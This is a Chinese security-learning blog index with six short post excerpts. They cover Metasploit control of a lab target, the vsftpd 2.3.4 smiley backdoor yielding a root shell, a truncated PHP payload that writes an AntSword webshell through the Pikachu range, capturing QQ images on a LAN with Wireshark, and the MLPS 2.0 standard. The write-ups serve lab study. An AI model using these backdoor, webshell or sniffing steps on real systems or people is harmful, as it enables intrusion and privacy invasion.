- 博客(6)
- 收藏
- 关注
RSS订阅原创 复现kali中实现对被控端控制
使用exploit命令进行漏洞利用 在靶机点击图标时得到以下。在msf6下用以下四条命令启动主控端。set lhost 虚拟机ip。通过命令行操作可知复现成功。
2024-10-27 17:12:01
334
原创 笑脸漏洞复现
1.打开虚拟机与靶机 使用nmap扫描自身ip 找到靶机ip 并得知21端口开放。2.使用 nmap -sV 命令 得到ftp服务版本为VSFTPD 2.3.4。3.连接靶机21端口 user 以:)结尾 pass 任意。4.连接6200端口 并使用whoami命令得知为root账户。先观察连接之前靶机6200端口是否开放。再次检测6200端口 现在开放了。
2024-10-26 19:48:40
270
原创 中国蚁剑的使用
使用准备好的语句 fputs(fopen('shell.php','w'),'<?这能在靶机对应的目录下创建一句话木马 然后打开蚁剑 连接密码为木马中的变量名。用pikachu靶场中exec "eval"题目进行示范。后点击添加 获得靶机控制权。
2024-10-23 21:40:18
285
原创 对等保2.0的理解
2. **风险导向**:与之前版本相比,对等保2.0更加注重风险评估,要求组织根据自身的业务特点和面临的威胁进行安全策略的制定。1. **安全目标**:对等保2.0强调保护信息系统的安全性、完整性和可用性,适应新技术发展和复杂网络环境下的安全需求。3. **分级管理**:继续采用分级管理的方式,将信息系统划分为不同的安全等级,根据等级制定相应的安全措施和管理要求。6. **合规性要求**:对等保2.0加强了对单位和组织在信息安全管理上的合规性要求,促进其遵循相关法律法规。
2024-10-08 10:32:02
218
原创 使用wireshark对QQ进行流量分析并抓取同一局域网下发送的图片
1.找到自己手机的ip,并以IP为过滤器找到交互的数据包2.通过对图片头进行过滤 分析找到图片的数据包 3.选择原始数据,另存为一张图片 4.丢入winhex进行分析,删去ffd8文件头前多余的得到原图片
2024-10-07 18:17:12
276
原创 与ZoomEye功能类似的搜索引擎还有哪些?如何进行子域名收集?
这个搜索引擎专注于发现连接到互联网的设备,包括服务器、路由器、摄像头等,可以帮助用户找到潜在的安全漏洞。: 这是一个中文的互联网资产搜索引擎,类似于 Shodan,可以用于搜索不同类型的网络设备。: 提供互联网设备和服务的实时搜索,用户可以查找设备信息和安全证书等。: 是一个网络情报搜索引擎,提供有关网络活动的实时数据和历史数据。: 专注于互联网资产扫描与安全评估,可以提供实时状态的安全监测。
2024-10-05 23:40:32
449
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人